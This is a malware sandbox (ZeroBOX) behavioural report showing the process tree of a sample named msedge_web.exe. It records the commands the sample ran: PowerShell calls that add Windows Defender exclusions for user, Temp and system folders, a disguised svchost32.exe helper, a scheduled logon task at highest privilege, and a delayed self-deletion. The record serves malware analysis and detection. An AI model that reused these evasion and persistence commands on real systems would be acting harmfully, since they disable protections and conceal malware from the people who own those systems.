| ZeroBOX

msedge_web.exe "C:\Users\test22\AppData\Local\Temp\msedge_web.exe"
2328
- cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
  2100
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
    180
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
    2212
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
    1896
  - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
    2820
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\msedge_web.exe"
  2440
  - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\msedge_web.exe"
    2320
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msedge_web" /tr '"C:\Users\test22\AppData\Roaming\msedge_web.exe"' & exit
      2840
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msedge_web" /tr '"C:\Users\test22\AppData\Roaming\msedge_web.exe"'
        2584
    - msedge_web.exe "C:\Users\test22\AppData\Roaming\msedge_web.exe"
      896
      - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2308
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        456
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        2084
      - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Roaming\msedge_web.exe"
        1984
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Roaming\msedge_web.exe"
        3032
    - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
      1164
      - choice.exe choice /C Y /N /D Y /T 3
        1796

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents